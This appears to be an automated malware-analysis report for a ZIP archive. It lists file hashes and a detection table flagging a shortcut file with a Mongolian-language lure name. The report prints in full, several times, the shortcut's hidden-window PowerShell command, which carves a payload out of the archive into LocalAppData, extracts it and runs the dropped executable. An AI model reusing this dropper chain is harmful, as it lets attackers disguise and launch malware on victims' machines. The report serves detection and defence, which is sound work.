20063941491e5727cb2cbf824c656294
ZIP Archive | MD5: 20063941491e5727cb2cbf824c656294 | Size: 670.99 KB | application/zip
|
Hash | Hash Value |
|---|---|
| MD5 | 20063941491e5727cb2cbf824c656294
|
| Sha1 | f99cf85b16f054713aedc017011803a45e3f3114
|
| Sha256 | a059d70e4f9095f167bd34ea4dfdab33be8f599907daefbd05f2ba3f2d6302be
|
| Sha384 | 25245b00659a80342ac2b3972fd46a3386d995b7f5f5dc4aabdd3e6a2ba178eecd95a25ce958df7513399d1b31d1b784
|
| Sha512 | 4f277557099ef5233dd8e51e09ae58bc479279eb3ece3c9a45bd58e3a014949265154adb8fc4f70d387eca74c656ff5202b7a83d6e4738b33c8cc6b803600849
|
| SSDeep | 12288:wdIM5CKurUbWLD596+I9sRTSnwFJqs7rR04bqDY001b7undDG0:wdIM5CK4UbWLDolYMs3R04bCI1fui0
|
| TLSH | A6E4BE01FFA09135E16B167248D6B2710A3FBEB54BB089C7BB91071A4B302D5B9376F6
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -w H ";$dcxtboewo = (ls -Pa $Home -Re -in 'ЕС-аас Х?нд?ж болзошг?и? асуудал.zip')[0].fullname;$nugcjmw = [SyStem.IO.File]::OpenReAd($dcxtboewo); $jpjlvlwrj = NeW-ObjEct byte[] $nugcjmw.Length; $nugcjmw.Read($jpjlvlwrj, 0, $jpjlvlwrj.Length); $nugcjmw.Close();$lwjap='wRi'+'tEAlL'+'bYtEs';$uysqzmr=1164; ;;[SySTem.IO.FIle]::$lwjap($Env:LocalAppdata+'\\rlylgjvgdr.so', $jpjlvlwrj[$uysqzmr..($uysqzmr+669696-1)]); ; TaR -xvf $Env:LocalAppdata\rlylgjvgdr.so -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\THUAPBYP-BIPG-TWAK-NIVO-UUAWKJMVSHLT\CNMNSST.exe;" |
| Deobfuscated PowerShell | -w "H" ";$dcxtboewo = (ls -Pa $Home -Re -in '????-?????? ?????????? ?????????????????? ??????????????.zip')[0].fullname;$nugcjmw = [SyStem.IO.File]::OpenReAd($dcxtboewo); $jpjlvlwrj = NeW-ObjEct byte[] $nugcjmw.Length; $nugcjmw.Read($jpjlvlwrj, 0, $jpjlvlwrj.Length); $nugcjmw.Close();$lwjap='wRitEAlLbYtEs';$uysqzmr=1164; ;;[SySTem.IO.FIle]::$lwjap($Env:LocalAppdata+'\\rlylgjvgdr.so', $jpjlvlwrj[$uysqzmr..($uysqzmr+669696-1)]); ; TaR -xvf $Env:LocalAppdata\rlylgjvgdr.so -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\THUAPBYP-BIPG-TWAK-NIVO-UUAWKJMVSHLT\CNMNSST.exe;" |
| Deobfuscated PowerShell | -w "H" ";$dcxtboewo = (ls -Pa $Home -Re -in '????-?????? ?????????? ?????????????????? ??????????????.zip')[0].fullname;$nugcjmw = [SyStem.IO.File]::OpenReAd($dcxtboewo); $jpjlvlwrj = NeW-ObjEct byte[] $nugcjmw.Length; $nugcjmw.Read($jpjlvlwrj, 0, $jpjlvlwrj.Length); $nugcjmw.Close();$lwjap='wRitEAlLbYtEs';$uysqzmr=1164; ;;[SySTem.IO.FIle]::$lwjap($Env:LocalAppdata+'\\rlylgjvgdr.so', $jpjlvlwrj[$uysqzmr..($uysqzmr+669696-1)]); ; TaR -xvf $Env:LocalAppdata\rlylgjvgdr.so -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\THUAPBYP-BIPG-TWAK-NIVO-UUAWKJMVSHLT\CNMNSST.exe;" |
| Deobfuscated PowerShell | $Env:LocalAppdata \thuapbyp-bipg-twak-nivo-uuawkjmvshlt\cnmnsst.exe "" |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -w H ";$dcxtboewo = (ls -Pa $Home -Re -in 'ЕС-аас Х?нд?ж болзошг?и? асуудал.zip')[0].fullname;$nugcjmw = [SyStem.IO.File]::OpenReAd($dcxtboewo); $jpjlvlwrj = NeW-ObjEct byte[] $nugcjmw.Length; $nugcjmw.Read($jpjlvlwrj, 0, $jpjlvlwrj.Length); $nugcjmw.Close();$lwjap='wRi'+'tEAlL'+'bYtEs';$uysqzmr=1164; ;;[SySTem.IO.FIle]::$lwjap($Env:LocalAppdata+'\\rlylgjvgdr.so', $jpjlvlwrj[$uysqzmr..($uysqzmr+669696-1)]); ; TaR -xvf $Env:LocalAppdata\rlylgjvgdr.so -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\THUAPBYP-BIPG-TWAK-NIVO-UUAWKJMVSHLT\CNMNSST.exe;" Malicious |
20063941491e5727cb2cbf824c656294 > ЕС-аас Хөндөж болзошгүй асуудал.lnk |
| Deobfuscated PowerShell | -w "H" ";$dcxtboewo = (ls -Pa $Home -Re -in '????-?????? ?????????? ?????????????????? ??????????????.zip')[0].fullname;$nugcjmw = [SyStem.IO.File]::OpenReAd($dcxtboewo); $jpjlvlwrj = NeW-ObjEct byte[] $nugcjmw.Length; $nugcjmw.Read($jpjlvlwrj, 0, $jpjlvlwrj.Length); $nugcjmw.Close();$lwjap='wRitEAlLbYtEs';$uysqzmr=1164; ;;[SySTem.IO.FIle]::$lwjap($Env:LocalAppdata+'\\rlylgjvgdr.so', $jpjlvlwrj[$uysqzmr..($uysqzmr+669696-1)]); ; TaR -xvf $Env:LocalAppdata\rlylgjvgdr.so -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\THUAPBYP-BIPG-TWAK-NIVO-UUAWKJMVSHLT\CNMNSST.exe;" Malicious |
20063941491e5727cb2cbf824c656294 > ЕС-аас Хөндөж болзошгүй асуудал.lnk > LNK CommandLine |
| Deobfuscated PowerShell | -w "H" ";$dcxtboewo = (ls -Pa $Home -Re -in '????-?????? ?????????? ?????????????????? ??????????????.zip')[0].fullname;$nugcjmw = [SyStem.IO.File]::OpenReAd($dcxtboewo); $jpjlvlwrj = NeW-ObjEct byte[] $nugcjmw.Length; $nugcjmw.Read($jpjlvlwrj, 0, $jpjlvlwrj.Length); $nugcjmw.Close();$lwjap='wRitEAlLbYtEs';$uysqzmr=1164; ;;[SySTem.IO.FIle]::$lwjap($Env:LocalAppdata+'\\rlylgjvgdr.so', $jpjlvlwrj[$uysqzmr..($uysqzmr+669696-1)]); ; TaR -xvf $Env:LocalAppdata\rlylgjvgdr.so -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\THUAPBYP-BIPG-TWAK-NIVO-UUAWKJMVSHLT\CNMNSST.exe;" Malicious |
20063941491e5727cb2cbf824c656294 > ЕС-аас Хөндөж болзошгүй асуудал.lnk > LNK CommandLine > [Deobfuscated PS] |
| Deobfuscated PowerShell | $Env:LocalAppdata \thuapbyp-bipg-twak-nivo-uuawkjmvshlt\cnmnsst.exe "" Malicious |
20063941491e5727cb2cbf824c656294 > ЕС-аас Хөндөж болзошгүй асуудал.lnk > LNK CommandLine > [PowerShell Command] |